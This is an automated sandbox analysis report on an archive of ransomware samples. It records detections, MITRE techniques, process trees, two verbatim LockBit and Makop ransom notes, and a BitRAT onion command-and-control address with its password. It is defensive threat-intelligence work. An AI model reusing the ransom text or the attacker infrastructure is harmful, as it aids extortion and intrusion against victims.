bitrat | 4f848bba2e46afeb3ea7e05989ce079d72840b35449625c956b83ba12234e92d

Analysis

max time kernel
57s
max time network
110s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-10-2024 16:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00423.7z
Size

51.9MB
MD5

239ccbce50c59713e3c466367b787691
SHA1

fcec0a4eb1626ecbda7c018040a386e1721cc83d
SHA256

4f848bba2e46afeb3ea7e05989ce079d72840b35449625c956b83ba12234e92d
SHA512

f94370f2588c1627b3796b731f237b681f75c4c6ae197d4ace6d44659fb74e73922b5109ab7e204867e4177278787d7045c6e69763afeed2f0ae6831db955bcf
SSDEEP

1572864:/LHP6QVWDjQhUxRoCuhsVIoRNzps5D1D99LkBAK5a:jHPZVckhQQsVTNKb1

Score

10^/10

bitrat lockbit makop modiloader redline agilenet defense_evasion discovery evasion execution impact infostealer pyinstaller ransomware trojan upx

Malware Config

Extracted

Path

C:\Program Files\dotnet\Restore-My-Files.txt

Family

lockbit

Ransom Note

All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: 1) Through a standard browser(FireFox, Chrome, Edge, Opera) | 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481B8B2035393FAA5EE | 2. Follow the instructions on this page 2) Through a Tor Browser - recommended | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481B8B2035393FAA5EE This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about

URLs

http://lockbit-decryptor.top/?BC76D224712A7481B8B2035393FAA5EE

http://lockbitks2tvnmwk.onion/?BC76D224712A7481B8B2035393FAA5EE

Extracted

Family

bitrat

Version

1.34

zwlknt25w6fs6ffnkllvutcepgp7mz6dsndkbki4l2fr27rnk7o4b7yd.onion:80

Attributes

communication_password
81dc9bdb52d04dc20036dbd8313ed055
tor_process
TORBUILD

Extracted

Path

F:\readme-warning.txt

Family

makop

Ransom Note

::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted and now have the "fair" extension. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in bitcoins. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: You can write us to our mailbox: [email protected] .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don�t want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

Emails

[email protected]

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Bitrat family
bitrat
Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit
Lockbit family
lockbit
Makop
Ransomware family discovered by @VK_Intel in early 2020.
ransomware makop
Makop family
makop
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

OfficeC2RClient.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	6960	6876	OfficeC2RClient.exe	WINWORD.EXE

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.Blocker.jzec-6297bd0997c41e86344533c451d5b57fece20753e2629be9145df90bde149800.exe	modiloader_stage2

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

6404 bcdedit.exe
6640 bcdedit.exe
Deletes backup catalog 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exe

pid process

3440 wbadmin.exe
10088 wbadmin.exe

pid	process
6404	bcdedit.exe
6640	bcdedit.exe

pid	process
3440	wbadmin.exe
10088	wbadmin.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeHEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe

Executes dropped EXE 5 IoCs

Processes:

HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-e4d1f8ff1282ac60adc0134aec2420aa652250ac8ddafe866e56d2fab165a132.exeHEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exeHEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe

pid	process
1624	HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exe
848	HEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exe
2956	HEUR-Trojan-Ransom.MSIL.Foreign.gen-e4d1f8ff1282ac60adc0134aec2420aa652250ac8ddafe866e56d2fab165a132.exe
4340	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
3440	HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe

Loads dropped DLL 4 IoCs

Processes:

HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe

pid	process
3440	HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe
3440	HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe
3440	HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe
3440	HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/848-160-0x00000000077D0000-0x00000000077F8000-memory.dmp	agile_net

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

54 bot.whatismyipaddress.com
576 ip-api.com

flow	ioc
54	bot.whatismyipaddress.com
576	ip-api.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\00423\Trojan-Ransom.Win32.AutoIt.zlw-7c28986fb7b3a2ef46068bf358c2818302ea3fbfe42c59734958b544a8206acf.exe	autoit_exe
C:\Users\Admin\RDP6\ConnectionClient.exe	autoit_exe

UPX packed file 22 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.Win32.Gen.vho-5eaa16d48ef3e37fa1b4dfb19fe3b46a35fc8789e39e4c1e590b9af97cc00662.exe	upx
behavioral1/memory/4208-214-0x0000000000400000-0x00000000007B1000-memory.dmp	upx
C:\Users\Admin\Downloads\PowerISO.exe	upx
behavioral1/memory/5772-423-0x0000000000400000-0x0000000000FF7000-memory.dmp	upx
behavioral1/memory/4208-1545-0x0000000000400000-0x00000000007B1000-memory.dmp	upx
behavioral1/memory/5772-4690-0x0000000000400000-0x0000000000FF7000-memory.dmp	upx
C:\Users\Admin\AppData\Local\a59e358a\tor\TORBUILD.exe	upx
behavioral1/memory/7312-5075-0x0000000000940000-0x0000000000D44000-memory.dmp	upx
behavioral1/memory/7312-5081-0x0000000069D80000-0x0000000069E08000-memory.dmp	upx
behavioral1/memory/7312-5083-0x000000006A0C0000-0x000000006A188000-memory.dmp	upx
behavioral1/memory/7312-5080-0x0000000069E10000-0x0000000069F1A000-memory.dmp	upx
behavioral1/memory/7312-5079-0x000000006A360000-0x000000006A384000-memory.dmp	upx
behavioral1/memory/7312-5078-0x000000006A070000-0x000000006A0B9000-memory.dmp	upx
behavioral1/memory/7312-5077-0x0000000069F20000-0x0000000069FEE000-memory.dmp	upx
behavioral1/memory/7312-5076-0x0000000069940000-0x0000000069C0F000-memory.dmp	upx
behavioral1/memory/7312-7738-0x0000000000940000-0x0000000000D44000-memory.dmp	upx
behavioral1/memory/7312-8199-0x0000000069940000-0x0000000069C0F000-memory.dmp	upx
behavioral1/memory/7312-8693-0x0000000069F20000-0x0000000069FEE000-memory.dmp	upx
behavioral1/memory/7312-8694-0x000000006A360000-0x000000006A384000-memory.dmp	upx
behavioral1/memory/7312-9713-0x000000006A0C0000-0x000000006A188000-memory.dmp	upx
behavioral1/memory/5772-12380-0x0000000000400000-0x0000000000FF7000-memory.dmp	upx
behavioral1/memory/7312-12220-0x0000000000940000-0x0000000000D44000-memory.dmp	upx

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\iconrdb.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
892	4340	WerFault.exe	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
4024	2620	WerFault.exe	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
8392	7756	WerFault.exe	Trojan-Ransom.Win32.Cryptor.ech-f58a28f7813f83dd0074d25fefb4cc8693b7c7004366e1a0494f98e4201498d0.exe
8404	5680	WerFault.exe	Trojan-Ransom.Win32.DoppelPaymer.ba-17528798f8b5ec83731a383b16b692bb3a5aa6d9c09fe0e9bb6fb92687350963.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

HEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-e4d1f8ff1282ac60adc0134aec2420aa652250ac8ddafe866e56d2fab165a132.exeHEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exeHEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.execmd.exetimeout.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Foreign.gen-e4d1f8ff1282ac60adc0134aec2420aa652250ac8ddafe866e56d2fab165a132.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

2816 timeout.exe
4180 timeout.exe
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exevssadmin.exe

pid process

3032 vssadmin.exe
6980 vssadmin.exe

pid	process
2816	timeout.exe
4180	timeout.exe

pid	process
3032	vssadmin.exe
6980	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exetaskmgr.exepowershell.exe

pid	process
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
2588	powershell.exe
2588	powershell.exe
2588	powershell.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

7zFM.exetaskmgr.exe

pid process

4844 7zFM.exe
3368 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

7zFM.exetaskmgr.exetaskmgr.exepowershell.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exe

description	pid	process
Token: SeRestorePrivilege	4844	7zFM.exe
Token: 35	4844	7zFM.exe
Token: SeSecurityPrivilege	4844	7zFM.exe
Token: SeDebugPrivilege	2220	taskmgr.exe
Token: SeSystemProfilePrivilege	2220	taskmgr.exe
Token: SeCreateGlobalPrivilege	2220	taskmgr.exe
Token: SeDebugPrivilege	3368	taskmgr.exe
Token: SeSystemProfilePrivilege	3368	taskmgr.exe
Token: SeCreateGlobalPrivilege	3368	taskmgr.exe
Token: 33	2220	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2220	taskmgr.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	848	HEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

7zFM.exetaskmgr.exetaskmgr.exe

pid	process
4844	7zFM.exe
4844	7zFM.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exetaskmgr.exe

pid	process
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
2220	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe
3368	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.execmd.exe

pid	process
1624	HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exe
1624	HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exe
2552	cmd.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

taskmgr.exepowershell.execmd.exeHEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.execmd.exe

description	pid	process	target process
PID 2220 wrote to memory of 3368	2220	taskmgr.exe	taskmgr.exe
PID 2220 wrote to memory of 3368	2220	taskmgr.exe	taskmgr.exe
PID 2588 wrote to memory of 2552	2588	powershell.exe	cmd.exe
PID 2588 wrote to memory of 2552	2588	powershell.exe	cmd.exe
PID 2552 wrote to memory of 1624	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exe
PID 2552 wrote to memory of 1624	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exe
PID 2552 wrote to memory of 1624	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exe
PID 2552 wrote to memory of 848	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exe
PID 2552 wrote to memory of 848	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exe
PID 2552 wrote to memory of 848	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-bdc7fa90a1a4ae03e63fe914c7222cd7019d1b3cd0676fa5ee3f6f7c04416d7b.exe
PID 2552 wrote to memory of 2956	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Foreign.gen-e4d1f8ff1282ac60adc0134aec2420aa652250ac8ddafe866e56d2fab165a132.exe
PID 2552 wrote to memory of 2956	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Foreign.gen-e4d1f8ff1282ac60adc0134aec2420aa652250ac8ddafe866e56d2fab165a132.exe
PID 2552 wrote to memory of 2956	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Foreign.gen-e4d1f8ff1282ac60adc0134aec2420aa652250ac8ddafe866e56d2fab165a132.exe
PID 2552 wrote to memory of 4340	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
PID 2552 wrote to memory of 4340	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
PID 2552 wrote to memory of 4340	2552	cmd.exe	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe
PID 2552 wrote to memory of 3440	2552	cmd.exe	HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe
PID 2552 wrote to memory of 3440	2552	cmd.exe	HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe
PID 2552 wrote to memory of 3440	2552	cmd.exe	HEUR-Trojan-Ransom.Win32.Agent.gen-4c8a08604c4ec8c78fdeff7cbb82eba5a901be1d2960dfce6ccac69aeb88b340.exe
PID 4340 wrote to memory of 4716	4340	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe	cmd.exe
PID 4340 wrote to memory of 4716	4340	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe	cmd.exe
PID 4340 wrote to memory of 4716	4340	HEUR-Trojan-Ransom.MSIL.Makop.gen-13c9d681432c3a57f8de0d295a1bf36c5a72587339bbb629e9467697d75c5634.exe	cmd.exe
PID 4716 wrote to memory of 2816	4716	cmd.exe	timeout.exe
PID 4716 wrote to memory of 2816	4716	cmd.exe	timeout.exe
PID 4716 wrote to memory of 2816	4716	cmd.exe	timeout.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00423.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4844

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2588
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Users\Admin\Desktop\00423\HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exe
    HEUR-Trojan-Ransom.MSIL.Agent.gen-99130eed4455022e46708007973bec154f132b885018754de5302d1ae65c6ffe.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1624
